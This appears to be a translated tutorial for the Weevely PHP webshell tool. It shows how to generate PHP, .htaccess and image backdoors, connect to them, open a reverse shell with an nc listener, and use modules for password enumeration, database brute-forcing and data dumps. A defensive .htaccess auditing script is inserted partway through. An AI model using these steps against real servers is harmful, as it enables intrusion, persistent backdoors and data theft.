Preface
Weevely is a webshell tool written in Python. It combines webshell generation and connection in a single client/server (C/S) tool, and can be regarded as a Linux replacement for the PHP "kitchen knife" (Chopper) webshell client. It is well concealed (randomly generated parameters and base64 encoding), and on Linux it is very powerful: server misconfiguration auditing, backdoor placement, brute-force cracking, file management, resource search, network proxying, command execution, database operations, system information collection, port scanning, and other functions. Some modules cannot be used on Windows. In general, it is still a very good tool. (It is only to be used for security learning and teaching. Illegal use is prohibited.)
Project address: http://epinna.github.com/Weevely/
Emilio Pinna's home page: http://disse.cting.org
Test environment: Kali Linux 1.0.6 amd64 + Apache + PHP
1. Generate a backdoor
The Weevely help shows that it can generate three forms of PHP backdoor:
:generate.php       // generate a PHP backdoor file
:generate.htaccess  // insert the backdoor code into .htaccess; .htaccess must be enabled on the server
:generate.img       // insert the backdoor code into an image and modify .htaccess; .htaccess must be enabled on the server
1.1 Generate a PHP backdoor file
Weevely generates a base64-encoded backdoor with random parameters:
Daniel has separated the encryption module out of Weevely so that it can be used to encrypt arbitrary webshells. Here is a brief introduction:
Encryption module:
Usage: python test.py intofile outfile
Test results:
1.2 Generate a .htaccess backdoor
1.3 Generate a .img image backdoor
2. Connect to a backdoor
The connection method is the same in every case, weevely <URL> <password>, so it is not described further here. However, .htaccess must be enabled on the server when connecting to a .htaccess or image backdoor:
Under Kali, find the Apache2 configuration file. Check /etc/apache2/apache2.conf first; if the setting is not there but the file includes other configuration files, check those in turn. Here it was found under the included sites-enabled/ directory, at the absolute path /etc/apache2/sites-enabled/000-default. Modify the following configuration to support .htaccess:
Example of connecting to an image backdoor:
Of course, Weevely also supports executing a command directly when connecting:
~$ weevely http://127.0.0.1/img_door/1.jpg Linger "ls"   // same result as the two preceding steps, which used the interactive shell
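From the defending side, the .htaccess and image backdoors of sections 1.2 and 1.3 only work where .htaccess overrides are honoured, so the .htaccess files under a webroot are worth auditing. The following is an added example, not part of the original article or of Weevely: it flags PHP code and PHP-handler directives in .htaccess content. The function name audit_htaccess, the directive list and the sample file are assumptions constructed for illustration.

```python
import re

# Generic Apache/PHP directives that can route non-.php files to the PHP
# interpreter or run extra PHP on every request. This list is an assumption
# made for the example; it is not taken from Weevely's generated output.
HANDLER = re.compile(r"^\s*(AddType|AddHandler|SetHandler|ForceType)\b(.*)$", re.I)
PREPEND = re.compile(r"^\s*php_value\s+auto_(prepend|append)_file\b", re.I)
PHP_HINT = re.compile(r"php", re.I)
PHP_EXT = re.compile(r"\.(php\d?|phtml)$", re.I)

# Constructed sample .htaccess content (not real tool output).
SAMPLE = """\
# constructed sample
Options -Indexes
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .php
php_value auto_prepend_file /tmp/x.inc
"""


def audit_htaccess(text):
    """Return (line_no, reason) findings for the contents of one .htaccess file."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if "<?" in line:  # PHP has no business inside .htaccess, even in a comment
            findings.append((no, "PHP open tag inside .htaccess"))
        if PREPEND.match(line):
            findings.append((no, "auto_prepend/append_file override"))
        m = HANDLER.match(line)
        if m and PHP_HINT.search(m.group(2)):
            exts = [t for t in m.group(2).split() if t.startswith(".")]
            odd = [e for e in exts if not PHP_EXT.search(e)]
            if odd or not exts:  # no extension listed means every file is affected
                findings.append((no, "PHP handler for " + (" ".join(odd) or "all files")))
    return findings


if __name__ == "__main__":
    for line_no, reason in audit_htaccess(SAMPLE):
        print(f"line {line_no}: {reason}")
```

Where a site does not need per-directory overrides at all, setting AllowOverride None in the Apache configuration stops .htaccess files from being read.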
3. Rich Weevely module functions
View the available Weevely modules (you can press the Tab key to enter console mode):
~# weevely help
module                description
--------------------  ---------------------------------------------------------
:audit.etcpasswd      Enumerate /etc/passwd
:audit.userfiles      List objects with permissions under user home directories
:audit.mapwebfiles    Enumerate the URLs of any web site
:shell.php            Compile a PHP file
:shell.sh             Write a system script
:system.info          Collect system information
:find.suidsgid        Search for SUID/SGID files and directories
:find.perms           Search for readable/writable/executable files and directories by permission
:backdoor.tcp         TCP port backdoor
:backdoor.reversetcp  Reverse TCP connection
:bruteforce.sql       Brute-force the password of the specified database username
:bruteforce.sqlusers  Crack all database user passwords
:file.upload          Upload a local file
:file.upload2web      Upload binary/ASCII files to the destination site folder and enumerate URLs
:file.enum            Enumerate remote files from a local wordlist
:file.read            Read a file
:file.rm              Delete a file
:file.check           Check the status of a remote file (MD5 value, size, permissions, etc.)
:file.download        Download remote binary/ASCII files to the local machine
:sql.console          Start the SQL console
:sql.dump             Back up the database, that is, dump it
:net.scan             Port scan
:net.phpproxy         Install a remote PHP proxy
:net.ifaces           Display network interface information of the remote host
:net.proxy            Install a tunnel communication proxy
Reverse TCP connection back to the local machine:
Listen locally on port 8008 and wait for the connection:
~$ nc -l -p 8008
Establish the TCP connection from Weevely:
You can see that the local machine has established a connection with the remote host:
Enumerate the URL links of a web site:
:audit.mapwebfiles http://xxx.xxx.xx.xx/index.php http://xxx.xxx.xx.xx /var/www/conf
Upload local files to the specified path on the remote host:
Download files from a remote host:
Of course, there are many other powerful functions. In the new version of Kali it seems that some new modules have been added, and their usage is similar. You can view a module's help with ":help shell.sh".
Weevely: getting-started notes